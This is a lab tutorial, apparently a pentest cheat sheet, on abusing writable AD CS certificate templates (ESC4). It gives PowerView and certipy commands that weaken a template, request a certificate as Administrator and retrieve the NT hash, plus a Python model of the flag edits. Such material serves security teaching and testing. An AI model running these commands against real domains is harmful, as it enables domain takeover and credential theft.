ESC4
ESC4 is a template ACL problem: a principal with write access to a certificate template object can create a misconfiguration in a template that is not initially vulnerable. For example, setting the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit of mspki-certificate-name-flag on a template that allows domain authentication (and removing the manager approval and authorized signature requirements) results in a situation equivalent to ESC1: a less privileged user can put an arbitrary Subject Alternative Name in the request and authenticate as another user.
Windows
Import-Module PowerView
PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1
Add Certificate-Enrollment rights (to the Domain Users group)
The GUID below is the Certificate-Enrollment extended right; granting it on the template object lets every member of Domain Users enroll in it:
PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose
Disabling Manager Approval Requirement
To disable the manager approval requirement, clear CT_FLAG_PEND_ALL_REQUESTS (0x2) in mspki-enrollment-flag. The command below writes the value 9 (INCLUDE_SYMMETRIC_ALGORITHMS 0x1 + PUBLISH_TO_DS 0x8), which overwrites any other bits that were set, so record the original value first if you intend to restore the template:
PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose
Disabling Authorized Signature Requirement
To disable the authorized signature requirement, set the mspki-ra-signature attribute to 0:
PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-ra-signature'=0} -Verbose
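Added example (not from the original page, and not certipy or PowerView code): a small model of the three attribute edits the Set-DomainObject commands above make, followed by the check that `certipy find -vulnerable` effectively performs afterwards. The flag bits and EKU OIDs are the documented msPKI values; the Template4 dictionary is constructed sample data, and the function names are this example's own.

```python
# Added example, not part of the original page: model the msPKI attribute
# edits made above and test whether the result satisfies the ESC1 conditions.
# Flag bits and EKU OIDs are the documented values; TEMPLATE4 is constructed
# sample data, not a real directory object.

# msPKI-Certificate-Name-Flag bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000

# msPKI-Enrollment-Flag bits
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002   # "CA certificate manager approval"
CT_FLAG_PUBLISH_TO_DS = 0x00000008
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# EKUs that let a certificate authenticate to the domain
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def allows_domain_auth(template):
    """True if the template's EKUs permit AD authentication.
    An empty EKU list means the certificate is valid for any purpose."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return not ekus or bool(ekus & AUTH_EKUS)


def requires_manager_approval(template):
    return bool(template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)


def enrollee_supplies_subject(template):
    return bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)


def is_esc1_like(template):
    """ESC1 conditions: the requester picks the subject/SAN, no manager
    approval, no authorized signatures, and the cert can be used for logon."""
    return (enrollee_supplies_subject(template)
            and not requires_manager_approval(template)
            and template["msPKI-RA-Signature"] == 0
            and allows_domain_auth(template))


def apply_esc4_edits(template):
    """Return a copy with the same edits the Set-DomainObject commands make."""
    t = dict(template)
    # @{'mspki-enrollment-flag'=9}: INCLUDE_SYMMETRIC_ALGORITHMS | PUBLISH_TO_DS.
    # This is an overwrite, not a bit clear: any other bit that was set
    # (AUTO_ENROLLMENT here) is lost, which is why the old value must be saved.
    t["msPKI-Enrollment-Flag"] = CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS
    # @{'mspki-ra-signature'=0}: no authorized signatures required
    t["msPKI-RA-Signature"] = 0
    # set ENROLLEE_SUPPLIES_SUBJECT so the requester controls the SAN
    t["msPKI-Certificate-Name-Flag"] |= CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return t


def changed_attributes(before, after):
    """Attributes that must be written back to restore the template
    (the information certipy's -save-old keeps in <template>.json)."""
    return {k: before[k] for k in before if before[k] != after.get(k)}


# Constructed sample: a client-auth template that is safe on its own because
# the subject is built from AD and issuance is held for manager approval.
TEMPLATE4 = {
    "cn": "Template4",
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS | CT_FLAG_PUBLISH_TO_DS | CT_FLAG_AUTO_ENROLLMENT,
    "msPKI-RA-Signature": 1,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
}

if __name__ == "__main__":
    modified = apply_esc4_edits(TEMPLATE4)
    print("ESC1-like before:", is_esc1_like(TEMPLATE4))   # False
    print("ESC1-like after: ", is_esc1_like(modified))    # True
    print("restore these:", changed_attributes(TEMPLATE4, modified))
```

The point of `changed_attributes` is the caveat from the enrollment-flag step: because the PowerShell commands write whole attribute values rather than toggling single bits, restoring the template means writing back the original values, not re-applying the inverse edits.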
Linux
Overwrite the ESC4-vulnerable template with an ESC1-style configuration, saving the old one
bobbuilder$ certipy template -u 'user1@lab.local' -p 'password1' -template Template4 -save-old -dc-ip 10.10.10.10
Confirm the template now shows as vulnerable
bobbuilder$ certipy find -u 'user1@lab.local' -p 'password1' -vulnerable -stdout -dc-ip 10.10.10.10
Abusing the modified template (ESC1: request a certificate with an arbitrary UPN)
bobbuilder$ certipy req -u 'user1@lab.local' -p 'password1' -ca lab-LAB-DC-CA -template Template4 -upn 'Administrator@lab.local'
Retrieve Administrator NT Hash
bobbuilder$ certipy auth -pfx administrator.pfx -username Administrator -domain lab.local
Restore template configuration from the JSON saved by -save-old
bobbuilder$ certipy template -u 'user1@lab.local' -p 'password1' -template Template4 -configuration Template4.json
- Overwrite template SSLTemplate4 (saving the old configuration)
bobbuilder$ certipy template -u 'user1@lab.local' -p 'password1' -template SSLTemplate4 -save-old -dc-ip 10.10.10.10
- Restore SSLTemplate4
bobbuilder$ certipy template -u 'user1@lab.local' -p 'password1' -template SSLTemplate4 -configuration SSLTemplate4.json -dc-ip 10.10.10.10